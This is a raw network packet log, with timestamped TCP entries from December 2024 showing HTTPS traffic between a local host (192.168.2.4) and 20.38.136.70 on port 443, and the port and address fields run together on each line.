                                                                                                                                                                                                          Dec 12, 2024 00:30:03.349492073 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.349566936 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.350882053 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.350965023 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.351897955 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.351967096 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.353419065 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.353503942 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.355045080 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.355119944 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.356753111 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.356837988 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.358108044 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.358201981 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.359512091 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.359612942 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.360625982 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.360713005 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.362066031 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.362155914 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.363018036 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.363095999 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.364564896 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.364665031 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.510035038 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.510257006 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.510262012 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.510333061 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.510382891 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.510384083 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.511930943 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.512010098 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.513422012 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.513489008 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.514189005 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.514270067 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.516345978 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.516431093 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.522685051 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.522757053 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.523286104 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.523355007 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.524955034 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.525032043 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.526482105 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.526556969 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.527513027 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.527580976 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.529071093 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.529139042 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.530751944 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.530822039 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.531579971 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.531646967 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.533215046 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.533284903 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.535518885 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.535584927 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.536845922 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.536906958 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.537401915 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.537472963 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.538970947 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.539042950 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.540750027 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.540812969 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.541829109 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.541898966 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.543469906 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.543541908 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544078112 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544151068 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544164896 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544281006 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544318914 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544344902 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544369936 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.544404984 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.701082945 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.701129913 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.701205015 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.701395035 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.701415062 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.776839972 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.777089119 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.777108908 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.778642893 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.778713942 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.778985977 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.779081106 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.779124975 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.819330931 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.819765091 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.819772959 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:05.865484953 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.464097977 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.464124918 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.464190006 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.464219093 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.480798960 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.480860949 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.480869055 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.480909109 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.491705894 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.491717100 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.491774082 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.508537054 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.508547068 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.508758068 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.658982038 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.658998013 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.659090042 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.665549040 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.665631056 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.680808067 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.680891991 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.695815086 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.695918083 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.712661028 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.712753057 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.718550920 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.718621016 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.726504087 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.726567030 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.741146088 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.741225958 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.756113052 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.756280899 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.847753048 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.847857952 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.858095884 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.858190060 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.864079952 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.864254951 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.875833988 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.875946999 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.886725903 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.886816025 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.891879082 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.892055035 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.902034998 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.902133942 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.910116911 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.910284996 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.913141012 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.913237095 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.918864965 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.918957949 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.924762011 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.924855947 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.924859047 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.924870014 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.924909115 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.930716991 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.930805922 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.936470032 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.936531067 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.939521074 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:06.939584970 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.066056967 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.066169977 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.069410086 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.069529057 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.074146032 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.074219942 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.079431057 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.079526901 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.083221912 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.083302975 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.087466002 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.087548018 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.090914011 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.091001034 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.093425035 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.093481064 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.098285913 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.098350048 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.102988005 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.103069067 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.105468035 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.105531931 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.110362053 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.110428095 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.115413904 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.115488052 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.120244980 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.120328903 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.122462034 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.122529984 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.126430988 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.126504898 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.129499912 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.129564047 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.134350061 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.134419918 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.136841059 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.136929035 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.141510963 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.141633034 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.145160913 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.145226002 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.150085926 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.150141954 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.154115915 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.154196024 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.157248020 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.157311916 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.162903070 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.162981987 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.542892933 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.542980909 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.546082973 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.546147108 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.546211958 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.546267033 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.546982050 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.547034979 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.548111916 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.548145056 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.548166037 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.548201084 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.548245907 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.548247099 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.549776077 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.549829960 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.549830914 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.549885988 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.549912930 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.549935102 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.550604105 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.550658941 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.551393986 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.551440954 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.551455021 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.551471949 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.551501036 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.553061962 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.553117037 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.553132057 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.553189039 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.553852081 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.553909063 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.554692030 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.554745913 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.555473089 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.555532932 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.556401014 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.556446075 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.556454897 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.556473970 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.556508064 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.557919979 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.557960987 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.557972908 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.557986975 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.558010101 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.558013916 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.558053970 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.558065891 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.558119059 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.560448885 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.560513020 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.561286926 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.561348915 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.562890053 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.562948942 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.564541101 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.564594030 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.565373898 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.565426111 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.567024946 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.567111969 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.568572044 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.568629980 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.569505930 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.569566965 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.571055889 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.571113110 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.572345018 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.572407961 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.573534012 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.573591948 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.575228930 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.575287104 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.576891899 CET4435001620.38.136.70192.168.2.4
